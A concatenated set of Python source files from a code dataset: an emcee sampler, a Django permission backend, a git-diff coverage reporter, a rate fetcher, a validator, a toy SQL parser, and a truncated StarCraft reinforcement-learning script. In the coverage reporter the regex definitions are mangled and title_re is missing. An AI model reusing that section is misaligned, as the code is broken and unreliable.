n_initial_steps\n Number of steps for initial (burn-in) sampling.\n true_values\n True parameter values, if known.\n kwargs\n Additional key-word arguments channeled to emcee.EnsembleSampler.\n\n Returns\n -------\n inference_data\n Contains the results of the sampling procedure.\n \"\"\"\n\n # log which solver is used\n logger.info(\n f\"Solving problem using emcee sampler with {n_initial_steps} + {n_steps} \"\n f\"samples and {n_walkers} walkers\"\n )\n if kwargs:\n logger.info(\"Additional options:\")\n print_dict_in_rows(kwargs, printer=logger.info)\n else:\n logger.info(\"No additional options specified\")\n\n # draw initial samples from the parameter's priors\n logger.debug(\"Drawing initial samples\")\n if self.seed is not None:\n np.random.seed(self.seed)\n sampling_initial_positions = np.zeros(\n (n_walkers, self.problem.n_latent_prms_dim)\n )\n theta_names = self.problem.get_theta_names(tex=False, components=False)\n for parameter_name in theta_names:\n idx = self.problem.parameters[parameter_name].index\n idx_end = self.problem.parameters[parameter_name].index_end\n samples = self.sample_from_prior(parameter_name, n_walkers)\n if (idx_end - idx) == 1:\n sampling_initial_positions[:, idx] = samples\n else:\n sampling_initial_positions[:, idx:idx_end] = samples\n\n # The following code is based on taralli and merely adjusted to the variables\n # in the probeye setup; see https://gitlab.com/tno-bim/taralli\n\n # ............................................................................ #\n # Pre-process #\n # ............................................................................ #\n\n def logprob(x):\n # Skip loglikelihood evaluation if logprior is equal\n # to negative infinity\n logprior = self.logprior(x)\n if logprior == -np.inf:\n return logprior\n\n # Otherwise return logprior + loglikelihood\n return logprior + self.loglike(x)\n\n logger.debug(\"Setting up EnsembleSampler\")\n sampler = emcee.EnsembleSampler(\n nwalkers=n_walkers,\n ndim=self.problem.n_latent_prms_dim,\n log_prob_fn=logprob,\n **kwargs,\n )\n\n if self.seed is not None:\n random.seed(self.seed)\n sampler.random_state = np.random.mtrand.RandomState(self.seed)\n\n # ............................................................................ #\n # Initial sampling, burn-in: used to avoid a poor starting point #\n # ............................................................................ #\n\n logger.debug(\"Starting sampling (initial + main)\")\n start = time.time()\n state = sampler.run_mcmc(\n initial_state=sampling_initial_positions,\n nsteps=n_initial_steps,\n progress=self.show_progress,\n )\n sampler.reset()\n\n # ............................................................................ #\n # Sampling of the posterior #\n # ............................................................................ #\n sampler.run_mcmc(\n initial_state=state, nsteps=n_steps, progress=self.show_progress\n )\n end = time.time()\n runtime_str = pretty_time_delta(end - start)\n logger.info(\n f\"Sampling of the posterior distribution completed: {n_steps} steps and \"\n f\"{n_walkers} walkers.\"\n )\n logger.info(f\"Total run-time (including initial sampling): {runtime_str}.\")\n logger.info(\"\")\n logger.info(\"Summary of sampling results (emcee)\")\n posterior_samples = sampler.get_chain(flat=True)\n with contextlib.redirect_stdout(stream_to_logger(\"INFO\")): # type: ignore\n self.summary = self.emcee_summary(\n posterior_samples, true_values=true_values\n )\n logger.info(\"\") # empty line for visual buffer\n self.raw_results = sampler\n\n # translate the results to a common data structure and return it\n var_names = self.problem.get_theta_names(tex=True, components=True)\n inference_data = az.from_emcee(sampler, var_names=var_names)\n return inference_data\n","repo_name":"BAMresearch/probeye","sub_path":"probeye/inference/emcee/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":10995,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"20750269076","text":"n = int(input())\narr = [list(map(int, input().split())) for _ in range(n)]\narr.sort(key = lambda x : x[0])\n\ndp = [0] * len(arr)\ndp[0] = 1\nfor i in range(1, len(dp)):\n max_num = 0\n for j in range(0, i):\n if arr[j][1] < arr[i][1]:\n max_num = max(max_num, dp[j])\n dp[i] = max_num + 1\n\nprint(len(dp)-max(dp))","repo_name":"jongbin26/coding_test","sub_path":"python/2565.py","file_name":"2565.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10325728306","text":"from django.contrib.auth.backends import ModelBackend\nfrom django.contrib.auth.models import Permission\nfrom django.db.models import Q, Exists, OuterRef\nfrom ..models.archive import Archive\n\nclass ArchiveBackend(ModelBackend):\n def get_group_permissions(self, user_obj, obj=None):\n perm_cache = super().get_group_permissions(user_obj, obj)\n group_perms = Permission.objects.filter(\n archivegrouppermission__group__user__id=user_obj.id,\n content_type__app_label='archive',\n )\n group_perms = group_perms.values_list(\n 'content_type__app_label',\n 'archivegrouppermission__archive__slug',\n 'codename',\n ).order_by()\n perm_cache = perm_cache.union({\n \"{label}.any.{codename}\".format(label=label, codename=codename)\n for label, slug, codename in group_perms\n })\n perm_cache = perm_cache.union({\n \"{label}.archive.{slug}.{codename}\".format(label=label, slug=slug, codename=codename)\n for label, slug, codename in group_perms\n })\n perms = Permission.objects.filter(\n group__user=user_obj,\n content_type__app_label='archive',\n )\n perms = perms.values_list('content_type__app_label', 'codename').order_by()\n perm_cache = perm_cache.union(self.implied_per_archive_permissions(perms))\n user_obj._group_perm_cache = perm_cache\n return perm_cache\n\n def implied_per_archive_permissions(self, values):\n return {\n \"{label}.archive.{slug}.{codename}\".format(label=label, codename=codename, slug=archive.slug)\n for label, codename in values\n for archive in Archive.objects.all()\n } | {\n \"{label}.any.{codename}\".format(label=label, codename=codename)\n for label, codename in values\n }\n\n def get_user_permissions(self, user_obj, obj=None):\n perm_cache = super().get_user_permissions(user_obj, obj)\n perms = Permission.objects.filter(\n archiveuserpermission__user=user_obj,\n content_type__app_label='archive',\n )\n perms = perms.values_list('content_type__app_label', 'archiveuserpermission__archive__slug', 'codename').order_by()\n perm_cache = perm_cache.union({\n \"{label}.any.{codename}\".format(label=label, codename=codename)\n for label, slug, codename in perms\n })\n perm_cache = perm_cache.union({\n \"{label}.archive.{slug}.{codename}\".format(label=label, slug=slug, codename=codename)\n for label, slug, codename in perms\n })\n if user_obj.is_superuser:\n perms = Permission.objects.filter(\n content_type__app_label='archive',\n )\n else:\n perms = Permission.objects.filter(\n user=user_obj,\n content_type__app_label='archive',\n )\n perms = perms.values_list('content_type__app_label', 'codename').order_by()\n perm_cache = perm_cache.union(self.implied_per_archive_permissions(perms))\n\n user_obj._user_perm_cache = perm_cache\n return perm_cache\n\n def has_perm(self, user_obj, perm, obj=None):\n return super().has_perm(user_obj, perm, obj)\n","repo_name":"workjonathan/kronofoto","sub_path":"kronofoto/archive/auth/backends.py","file_name":"backends.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33381489748","text":"from __future__ import print_function\n\nimport argparse\nfrom collections import Counter\nimport os\nimport re\nimport subprocess\n\nfile_re = re.compile(r'diff --git a/(\\S+)')\ndiff_region_re = re.compile(r'@@\\s[-]\\S+\\s[+](\\S+)\\s@@')\nsource_line_re = re.compile(r'

    Coverage for [^:]+:\\s+(\\d+%)<\\/title>')\nsummary_end_re = re.compile(r'\\s+')\n\n__version__ = \"0.7\"\n\n\nclass DiffCollectionFailed(Exception):\n pass\n\n\nclass SourceLine(object):\n\n def __init__(self, line_number, is_context=True, code=''):\n self.line_number = line_number\n self.is_context = is_context\n self.code = code\n self.status = '???'\n\n def __eq__(self, other):\n return (self.line_number == other.line_number and\n self.is_context == other.is_context)\n\n def __repr__(self):\n return \"SourceLine(line_number=%d, is_context=%s)\" % (self.line_number,\n self.is_context)\n\n\nclass SourceModule(object):\n\n def __init__(self, filename, lines):\n self.filename = filename\n self.lines = lines\n self.line_num_map = {l.line_number: l for l in lines}\n self.cover_file = (filename.replace('/', '_').replace('.', '_') +\n \".html\")\n self.have_report = False\n self.coverage = '??%'\n\n def update_line_status(self, line_number, status):\n if line_number in self.line_num_map:\n line = self.line_num_map[line_number]\n if status.startswith('pln'):\n line.status = ' '\n else:\n line.status = status[4:7]\n\n def report(self):\n output = self.filename\n if not self.have_report:\n return \"%s (No coverage data)\\n\" % output\n if not self.lines or all(l.is_context for l in self.lines):\n return \"%s (No added/changed lines)\\n\" % output\n stats = Counter([l.status for l in self.lines if not l.is_context])\n output += \" (run={}, mis={}, par={}, ign={}) {}\\n\".format(\n stats['run'], stats['mis'], stats['par'], stats[' '],\n self.coverage)\n last_line = None\n for line in self.lines:\n if last_line and line.line_number != (last_line + 1):\n output += \"\\n\"\n output += \"{:5d} {} {} {}\\n\".format(\n line.line_number, line.status,\n ' ' if line.is_context else '+', line.code)\n last_line = line.line_number\n return output\n\n\ndef check_coverage_status(coverage_info, module):\n for coverage_line in coverage_info:\n m = title_re.match(coverage_line)\n if m:\n module.coverage = m.group(1)\n continue\n if summary_end_re.match(coverage_line):\n return\n m = source_line_re.match(coverage_line)\n if m:\n line_num = int(m.group(1))\n status = m.group(2)\n module.update_line_status(line_num, status)\n\n\ndef check_coverage_file(root, module):\n \"\"\"Check the lines in coverage file and report coverage status.\"\"\"\n report_file = os.path.join(root, 'cover', module.cover_file)\n if not os.path.isfile(report_file):\n return # No coverage data for file\n with open(report_file) as coverage_info:\n coverage_lines = coverage_info.readlines()\n check_coverage_status(coverage_lines, module)\n module.have_report = True\n\n\ndef collect_diff_lines(diff_region, start, last):\n \"\"\"Find added and context lines in a diff region.\n\n Note: If the diff region is at the start or end of the file, there\n may not be context lines.\n \"\"\"\n lines = []\n line_num = start\n while line_num <= last:\n line = next(diff_region)\n if line.startswith('-'):\n continue\n lines.append(SourceLine(line_num, is_context=line.startswith(' '),\n code=line[1:]))\n line_num += 1\n return lines\n\n\ndef parse_diffs(diff_output):\n \"\"\"Collect the file and ranges of diffs added, if any.\"\"\"\n added_lines = []\n source_file = ''\n diff_lines = iter(diff_output.splitlines())\n for line in diff_lines:\n m = file_re.match(line)\n if m:\n source_file = m.group(1)\n continue\n m = diff_region_re.match(line)\n if m:\n start, comma, num = m.group(1).partition(',')\n start = int(start)\n if num:\n last = start + int(num) - 1\n else:\n last = start\n added_lines += collect_diff_lines(diff_lines, start, last)\n return (source_file, added_lines)\n\n\ndef collect_diffs_for_files(root, versions, source_files, context_lines):\n \"\"\"Generator to obtain the diffs for files.\"\"\"\n os.chdir(root)\n for filename in source_files:\n command = ['git', 'diff', '-U%d' % context_lines,\n '-w', versions, '--', filename]\n p = subprocess.Popen(command,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n diff_lines, err = p.communicate()\n if err:\n raise DiffCollectionFailed(\n \"Unable to collect diffs for file %s/%s: %s\" %\n (root, filename, err))\n yield diff_lines\n\n\ndef collect_diff_files(root, versions):\n \"\"\"Generator to obtain all the diff files.\"\"\"\n command = ['git', 'diff', '--name-only', versions]\n os.chdir(root)\n p = subprocess.Popen(command,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = p.communicate()\n if err:\n raise DiffCollectionFailed(\"Unable to find diff files to examine \"\n \"in %s: %s\" % (root, err))\n for filename in out.splitlines():\n if not os.path.basename(filename).startswith('.'):\n yield filename\n\n\ndef validate(parser, provided_args=None):\n args = parser.parse_args(provided_args)\n args.root = os.path.abspath(args.root)\n if not os.path.isdir(args.root):\n parser.error(\"The repo-dir must be a directory pointing to the top \"\n \"of the Git repo\")\n if not os.path.isdir(os.path.join(args.root, 'cover')):\n parser.error(\"Missing cover directory for project\")\n if args.commits == 'working':\n args.commits = 'HEAD'\n elif args.commits == 'committed':\n args.commits = 'HEAD^..HEAD'\n return args\n\n\ndef main():\n args = validate(setup_parser())\n files = collect_diff_files(args.root, args.commits)\n diff_files = collect_diffs_for_files(args.root, args.commits, files,\n args.context)\n for diffs in diff_files:\n source_file, lines = parse_diffs(diffs)\n module = SourceModule(source_file, lines)\n check_coverage_file(args.root, module)\n print(module.report())\n\n\ndef setup_parser():\n parser = argparse.ArgumentParser(\n description='Reports coverage for a commit in repo.')\n parser.add_argument(\n '-c', '--context', action='store', type=int, default=3,\n help='Number of context lines around diff regions. Default=3.')\n parser.add_argument(\n '-w', '--which', action='store', default=\"working\", dest='commits',\n help=\"Which commit(s) to compare. Use 'working', 'commit', or \"\n \"custom commit specification. Latest should be same as cover run. \"\n \"Default='working'.\")\n parser.add_argument(dest='root', metavar='repo-dir',\n help=\"Root of Git repo\")\n return parser\n","repo_name":"pmichali/commit-coverage","sub_path":"commit_coverage/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7578,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"21931316268","text":"\"\"\" get rates module \"\"\"\n\nfrom concurrent.futures import ThreadPoolExecutor\nfrom datetime import date\nimport threading\n\nimport requests\n\nfrom rates_demo.business_days import business_days\nimport rates_demo.rates_orchestrator as ro\n\ndef get_rates(base_url: str) -> list[str]:\n \"\"\" get rates \"\"\"\n\n start_date = date(2021, 1, 1)\n end_date = date(2021, 1, 31)\n rates: list[str] = []\n\n for business_day in business_days(start_date, end_date):\n rates_url = \"\".join([base_url, \"/api/\",\n business_day.strftime(\"%Y-%m-%d\"),\n \"?base=USD&symbols=EUR\"])\n\n response = requests.request(\"GET\", rates_url)\n rates.append(response.text)\n\n return rates\n\n\ndef get_rate_task(base_url: str, business_day: date) -> None:\n \"\"\" get rate for a single day from the rest api \"\"\"\n\n rates_url = \"\".join([base_url, \"/api/\",\n business_day.strftime(\"%Y-%m-%d\"),\n \"?base=USD&symbols=EUR\"])\n\n ro.process_rates_queue.put(requests.request(\"GET\", rates_url).text)\n\n\ndef get_rates_threaded(base_url: str) -> None:\n \"\"\" get rates using multiple threads \"\"\"\n\n start_date = date(2021, 1, 1)\n end_date = date(2021, 1, 31)\n threads: list[threading.Thread] = []\n\n for business_day in business_days(start_date, end_date):\n a_thread = threading.Thread(\n target=get_rate_task, args=(base_url, business_day))\n a_thread.start()\n threads.append(a_thread)\n\n for a_thread in threads:\n a_thread.join()\n\n ro.get_rates_done.set()\n\n\n# def get_rates_threadpool(base_url: str) -> list[str]:\n# \"\"\" get rates using multiple threads \"\"\"\n\n# start_date = date(2021, 1, 1)\n# end_date = date(2021, 1, 31)\n\n# with ThreadPoolExecutor() as executor:\n\n# return list(executor.map(\n# lambda params: get_rate_task(*params),\n# [ (base_url, business_day) for business_day\n# in business_days(start_date, end_date)]\n# ))\n\n\n","repo_name":"t4d-classes/advanced-python_05102021","sub_path":"python_demos/rates_demo/get_rates.py","file_name":"get_rates.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73826630951","text":"import ipaddress\n\nclass Validator:\n\n ALLOWED_STATES = [\n 'NY',\n 'CA',\n 'AZ',\n 'TX',\n 'OH'\n ]\n\n ALLOWED_ESTIMATION_TYPES = [\n 'normal',\n 'premium'\n ]\n\n MANDATORY_PARAMETERS = [\n 'km',\n 'type',\n 'base_amount',\n 'state',\n ]\n\n NUMBER_PARAMETERS = [\n 'km',\n 'base_amount'\n ]\n\n def validate(self, params, ip):\n self.validate_ip(ip)\n self.validate_params_integrity(params)\n self.validate_state(params['state'])\n self.validate_type(params['type'])\n self.validate_numbers(params)\n\n def validate_params_integrity(self, params):\n params_sent = list(params.keys())\n for param in self.MANDATORY_PARAMETERS:\n if param not in params_sent:\n raise Exception(\"param \"+param+\" is a mandatory\")\n if params[param] == '':\n raise Exception(\"param \"+param+\" shouldn't be empty\")\n\n def validate_state(self, state:str):\n if state.upper() not in self.ALLOWED_STATES:\n raise Exception('unsupported state')\n\n def validate_type(self, type:str):\n if type.lower() not in self.ALLOWED_ESTIMATION_TYPES:\n raise Exception('unsupported type')\n\n def validate_ip(self, ip):\n try:\n ipaddress.ip_address(ip)\n except ValueError:\n raise Exception(\"ip is not valid\")\n\n def validate_numbers(self, params):\n for param in self.NUMBER_PARAMETERS:\n if not params[param].isnumeric():\n try:\n float(params[param])\n except ValueError:\n raise Exception(\"param \"+param+\" must be numeric\")\n\n","repo_name":"dsmunoz/total-calculator","sub_path":"services/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73830448874","text":"from django.urls import path, include\n\nfrom wind_simulation_model.views import (\n wind_station_simulation_main, wind_station_simulation_now, wind_station_simulation_forecast,\n calculate_solar_radiation, get_forecast_data, turbines, turbine_in_detail, add_turbine,\n edit_turbine, edit_turbine_field, delete_turbine_table, add_turbine_field, get_all_forecast_data\n)\n\n\nurlpatterns = [\n path('solar_radiation', calculate_solar_radiation, name='calculate_solar_radiation'),\n\n path('wind_simulation', wind_station_simulation_main, name='wind_station_simulation_main'),\n path('wind_simulation/now', wind_station_simulation_now, name='wind_station_simulation_now'),\n path('wind_simulation/forecast', wind_station_simulation_forecast, name='wind_station_simulation_forecast'),\n\n path('wind_simulation/list_of_turbines', turbines, name='list_of_turbines'),\n path('wind_simulation/list_of_turbines/', turbine_in_detail, name='turbine_ib_detail'),\n\n path('wind_simulation/add_turbine', add_turbine, name='add_turbine'),\n path('wind_simulation/list_of_turbines//add', add_turbine_field, name='add_turbine_field'),\n\n path('wind_simulation/list_of_turbines//edit', edit_turbine, name='edit_turbine'),\n path('wind_simulation/list_of_turbines//edit/', edit_turbine_field, name='edit_turbine_field'),\n\n path('wind_simulation/list_of_turbines//delete', delete_turbine_table, name='delete_turbine_table'),\n\n path('get_forecast_data', get_forecast_data, name='get_forecast_data'),\n path('get_all_forecast_data', get_all_forecast_data, name='get_forecast_data'),\n]\n","repo_name":"Oleg-tech/solar-system-monitoring-service","sub_path":"house_monitoring_system/wind_simulation_model/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12732656918","text":"import re\n\n\nclass Keyword:\n def __init__(self, value: str):\n self.value = value\n\n def __eq__(self, other):\n if not isinstance(other, Keyword):\n return False\n\n return self.value == other.value\n\n def __repr__(self):\n return f'Keyword(value=\"{self.value}\")'\n\n\nclass Literal:\n def __init__(self, value: str):\n self.value = value\n\n def __eq__(self, other):\n if not isinstance(other, Literal):\n return False\n\n return self.value == other.value\n\n def __repr__(self):\n return f'Literal(value=\"{self.value}\")'\n\n\nclass Select:\n def __init__(\n self,\n select_list: list[str],\n select_from: list[str],\n join: list[tuple[str, str, tuple]],\n where: tuple\n ):\n self.select_list = select_list\n self.select_from = select_from\n self.join = join\n self.where = where\n\n def __eq__(self, other):\n if not isinstance(other, Select):\n return False\n\n return (\n self.select_list == other.select_list\n and self.select_from == other.select_from\n and self.join == other.join\n and self.where == other.where\n )\n\n def __repr__(self):\n return f'Select(select_list={self.select_list}, select_from={self.select_from}, join={self.join}, where={self.where})'\n\n\nclass InvalidTokenError(Exception):\n pass\n\n\nTokens = list[Keyword | Literal | Select]\n\n\ndef parse_sql(s: str) -> Tokens:\n position = skip_white_spaces(s, 0)\n select, position = read_query(s, position)\n return [select]\n\n\ndef skip_white_spaces(s: str, position: int) -> int:\n while position < len(s) and s[position] in (' ', '\\t', '\\n', '\\r'):\n position += 1\n return position\n\n\ndef read_query(s: str, position: int) -> tuple[Select, int]:\n _, position = read_keyword('select', s, position)\n select_list, position = read_list(s, position)\n _, position = read_keyword('from', s, position)\n select_from, position = read_list(s, position)\n join, position = read_joins(s, position)\n where, position = read_where(s, position)\n return Select(select_list=select_list, select_from=select_from, join=join, where=where), position\n\n\ndef read_list(s: str, position: int) -> tuple[list, int]:\n items = []\n while position < len(s):\n value, position = read_until_separator(s, position)\n items.append(value)\n position = skip_white_spaces(s, position)\n if position >= len(s) or s[position] != ',':\n break\n position += 1\n position = skip_white_spaces(s, position)\n\n position = skip_white_spaces(s, position)\n return items, position\n\n\ndef read_until(values: list[str], s: str, position: int) -> tuple[str, int]:\n start = position\n while position < len(s):\n found_value = any(s[position:].lower().startswith(value) for value in values)\n if found_value:\n break\n\n position += 1\n\n return s[start:position], position\n\n\ndef read_until_white_space(s: str, position: int) -> tuple[str, int]:\n value, position = read_until([' ', '\\t', '\\n', '\\r'], s, position)\n position = skip_white_spaces(s, position)\n return value, position\n\n\ndef read_until_white_space_or_bracket(s: str, position: int) -> tuple[str, int]:\n value, position = read_until([' ', '\\t', '\\n', '\\r', ')', '('], s, position)\n position = skip_white_spaces(s, position)\n return value, position\n\n\ndef read_until_separator(s: str, position: int) -> tuple[str, int]:\n return read_until([',', ' ', '\\t', '\\n', '\\r'], s, position)\n\n\ndef read_keyword(keyword: str, s: str, position: int) -> tuple[Keyword, int]:\n t = s[position:].lower()\n if t.startswith(keyword):\n position = skip_white_spaces(s, position + len(keyword))\n return Keyword(keyword), position\n\n raise InvalidTokenError(f'Invalid token at position {position}: expected keyword \"{keyword}\"')\n\n\ndef read_keywords(keywords: list[str], s: str, position: int) -> tuple[Keyword, int]:\n t = s[position:].lower()\n\n for keyword in keywords:\n if t.startswith(keyword):\n position = skip_white_spaces(s, position + len(keyword))\n return Keyword(keyword), position\n\n raise InvalidTokenError(f'Invalid token at position {position}: expected keywords \"{keywords}\"')\n\n\ndef read_literal(s: str, position: int) -> tuple[Literal, int]:\n start = position\n while position < len(s) and s[position] not in (' ', '\\t', '\\n', '\\r'):\n position += 1\n\n return Literal(s[start:position]), position\n\n\ndef read_joins(s: str, position: int) -> tuple[list, int]:\n joins = []\n while position < len(s):\n position = skip_white_spaces(s, position)\n if re.match(r'^left\\s+outer\\s+join\\s+', s[position:], re.IGNORECASE) is not None:\n join, position = read_left_outer_join(s, position)\n elif re.match(r'^inner\\s+join\\s+', s[position:], re.IGNORECASE) is not None:\n join, position = read_inner_join(s, position)\n elif re.match(r'^join\\s+', s[position:], re.IGNORECASE) is not None:\n join, position = read_join(s, position)\n else:\n break\n\n joins.extend(join)\n\n position = skip_white_spaces(s, position)\n return joins, position\n\n\ndef read_left_outer_join(s: str, position: int) -> tuple[list, int]:\n _, position = read_keyword('left', s, position)\n _, position = read_keyword('outer', s, position)\n _, position = read_keyword('join', s, position)\n table, position = read_until_white_space(s, position)\n _, position = read_keyword('on', s, position)\n conditions, position = read_conditions(s, position)\n return [('left outer join', table, conditions)], position\n\n\ndef read_inner_join(s: str, position: int) -> tuple[list, int]:\n _, position = read_keyword('inner', s, position)\n _, position = read_keyword('join', s, position)\n value, position = read_until_white_space(s, position)\n _, position = read_keyword('on', s, position)\n conditions, position = read_conditions(s, position)\n return [('inner join', value, conditions)], position\n\n\ndef read_join(s: str, position: int) -> tuple[list, int]:\n _, position = read_keyword('join', s, position)\n value, position = read_until_white_space(s, position)\n _, position = read_keyword('on', s, position)\n conditions, position = read_conditions(s, position)\n return [('join', value, conditions)], position\n\n\ndef read_where(s: str, position: int) -> tuple[tuple | None, int]:\n if not s[position:].lower().startswith('where'):\n return None, position\n\n _, position = read_keyword('where', s, position)\n conditions, position = read_conditions(s, position)\n\n return conditions, position\n\n\ndef read_conditions(s: str, position: int) -> tuple[tuple, int]:\n operands = []\n operators = []\n while position < len(s):\n if s[position] == '(':\n operators.append('(')\n position = skip_white_spaces(s, position + 1)\n\n left, position = read_until_white_space(s, position)\n operator, position = read_until_white_space(s, position)\n right, position = read_until_white_space_or_bracket(s, position)\n\n condition = (left, operator, right)\n operands.append(condition)\n\n if position < len(s) and s[position] == ')':\n position = skip_white_spaces(s, position + 1)\n while len(operators) > 0 and operators[-1] != '(':\n boolean_operator = operators.pop()\n right_condition = operands.pop()\n left_condition = operands.pop()\n operands.append((boolean_operator, left_condition, right_condition))\n operators.pop()\n\n if re.match(r'^(and|or)', s[position:], re.IGNORECASE) is None:\n break\n\n keyword, position = read_keywords(['and', 'or'], s, position)\n boolean_operator = keyword.value\n\n while len(operators) > 0 and operators[-1] == 'and' and boolean_operator == 'or':\n last_boolean_operator = operators.pop()\n\n if last_boolean_operator == '(':\n break\n\n right_condition = operands.pop()\n left_condition = operands.pop()\n operands.append((last_boolean_operator, left_condition, right_condition))\n\n operators.append(boolean_operator)\n\n while len(operators) > 0:\n boolean_operator = operators.pop()\n right_condition = operands.pop()\n left_condition = operands.pop()\n operands.append((boolean_operator, left_condition, right_condition))\n\n conditions = operands.pop()\n\n position = skip_white_spaces(s, position)\n return conditions, position\n","repo_name":"inikolaev/toy-database-engine","sub_path":"sql_parser.py","file_name":"sql_parser.py","file_ext":"py","file_size_in_byte":8715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35607249368","text":"from saida_gym.starcraft.vultureVsZealot import VultureVsZealot\r\n## gym 환경 import VultureVsZealot\r\n\r\nfrom collections import deque\r\nimport numpy as np\r\nimport random\r\nimport os\r\nimport math\r\nimport pickle\r\nimport time\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nfrom torch.distributions import Categorical ## 분포 관련\r\nfrom tensorboardX import SummaryWriter\r\n\r\nclass Actor(nn.Module):\r\n def __init__(self, state_size, action_size):\r\n super(Actor, self).__init__()\r\n self.fc1 = nn.Linear(state_size,128) ## input state\r\n self.fc2 = nn.Linear(128,512)\r\n self.fc3 = nn.Linear(512,128)\r\n self.fc4 = nn.Linear(128,action_size) ## output each action\r\n\r\n def forward(self, x, soft_dim):\r\n x = torch.tanh(self.fc1(x))\r\n x = torch.tanh(self.fc2(x))\r\n x = torch.tanh(self.fc3(x))\r\n \r\n prob_each_actions = F.softmax(self.fc4(x),dim=soft_dim) ## NN에서 각 action에 대한 확률을 추정한다.\r\n\r\n return prob_each_actions\r\n\r\ndef scale_velocity(v):\r\n return v / 6.4\r\n\r\ndef scale_coordinate(pos):\r\n if pos > 0:\r\n return 1 if pos > 320 else int(pos / 16) / 20\r\n else:\r\n return -1 if pos < -320 else int(pos / 16) / 20\r\n\r\ndef scale_angle(angle):\r\n return (angle - math.pi) / math.pi\r\n\r\ndef scale_cooldown(cooldown):\r\n return (cooldown + 1) / 15\r\n\r\ndef scale_vul_hp(hp):\r\n return hp / 80\r\n\r\ndef scale_zeal_hp(hp):\r\n return hp / 160\r\n\r\ndef scale_bool(boolean):\r\n return 1 if boolean else 0\r\n\r\ndef rearrange_State(observation, state_size, env):\r\n state_arr = deque(maxlen=state_size)\r\n\r\n my_x = 0\r\n my_y = 0\r\n if observation.my_unit:\r\n for idx, me in enumerate(observation.my_unit): ## 9\r\n my_x = me.pos_x\r\n my_y = me.pos_y\r\n state_arr.append(math.atan2(me.velocity_y, me.velocity_x) / math.pi)\r\n state_arr.append(scale_velocity(math.sqrt((me.velocity_x) ** 2 + (me.velocity_y) ** 2)))\r\n state_arr.append(scale_cooldown(me.cooldown))\r\n state_arr.append(scale_vul_hp(me.hp))\r\n state_arr.append(scale_angle(me.angle))\r\n state_arr.append(scale_bool(me.accelerating))\r\n state_arr.append(scale_bool(me.braking))\r\n state_arr.append(scale_bool(me.attacking))\r\n state_arr.append(scale_bool(me.is_attack_frame))\r\n for i, terrain in enumerate(me.pos_info): ##12\r\n state_arr.append(terrain.nearest_obstacle_dist / 320)\r\n else:\r\n for _ in range(state_size - 11):\r\n state_arr.append(0)\r\n\r\n if observation.en_unit:\r\n for idx, enemy in enumerate(observation.en_unit): ## 11\r\n state_arr.append(math.atan2(enemy.pos_y - my_y, enemy.pos_x - my_x) / math.pi)\r\n state_arr.append(scale_coordinate(math.sqrt((enemy.pos_x - my_x) ** 2 + (enemy.pos_y - my_y) ** 2)))\r\n state_arr.append(math.atan2(enemy.velocity_y, enemy.velocity_x) / math.pi)\r\n state_arr.append(scale_velocity(math.sqrt((enemy.velocity_x) ** 2 + (enemy.velocity_y) ** 2)))\r\n state_arr.append(scale_cooldown(enemy.cooldown))\r\n state_arr.append(scale_zeal_hp(enemy.hp + enemy.shield))\r\n state_arr.append(scale_angle(enemy.angle))\r\n state_arr.append(scale_bool(enemy.accelerating))\r\n state_arr.append(scale_bool(enemy.braking))\r\n state_arr.append(scale_bool(enemy.attacking))\r\n state_arr.append(scale_bool(enemy.is_attack_frame))\r\n else:\r\n for _ in range(11):\r\n state_arr.append(0)\r\n \r\n\r\n return state_arr\r\n\r\ndef reward_reshape(state, next_state, reward, done):\r\n\r\n KILL_REWARD = 10\r\n DEAD_REWARD = -10\r\n DAMAGED_REWARD = -4\r\n HIT_REWARD = 2\r\n\r\n if done:\r\n if reward > 0: ## env에서 반환된 reward가 1 이면, 질럿을 잡음.\r\n reward = KILL_REWARD\r\n if next_state[3] == 1.0 and next_state[-6] == 0: ## perfect clear했다면 추가 bonus reward\r\n reward+=5\r\n \r\n return reward\r\n # 잡은 경우\r\n else: ## 게임이 종료되고 -1 값을 받게 된다면, \r\n reward = DEAD_REWARD\r\n return reward\r\n else: ## 게임이 종료되지 않았다면,\r\n my_pre_hp = state[3]\r\n my_cur_hp = next_state[3]\r\n \r\n en_pre_hp = state[-6]\r\n en_cur_hp = next_state[-6]\r\n \r\n if my_pre_hp - my_cur_hp > 0: ## 벌쳐가 맞아 버렸네 ㅠㅠ\r\n reward += DAMAGED_REWARD\r\n if en_pre_hp - en_cur_hp > 0: ## 질럿을 때려 버렸네 ㅠㅠ\r\n reward += HIT_REWARD\r\n \r\n ## 벌쳐가 맞고, 질럿도 때리는 2가지 동시 case가 있을 거 같아. reward를 +=을 했고 각각 if문으로 처리했습니다.\r\n \r\n return reward\r\n\r\ndef main():\r\n \r\n load = True\r\n episode = 0 ## 21710:91.1% 21610: 91% 21600: 90% 여러 모델 테스트 결과 중 3 모델이 90% 이상을 보였음.\r\n ## 환경의 초기, 진행되는 episode의 조건에 따라 86% ~ 91% 까지 perfect score를 보임. \r\n \r\n env = VultureVsZealot(version=0, frames_per_step=12, action_type=0, move_angle=20, move_dist=3, verbose=0, no_gui=False\r\n ,auto_kill=False)\r\n print_interval = 10\r\n \r\n learning_rate=0.00003\r\n torch.manual_seed(500)\r\n \r\n state_size = 38\r\n \r\n action_size= 19\r\n 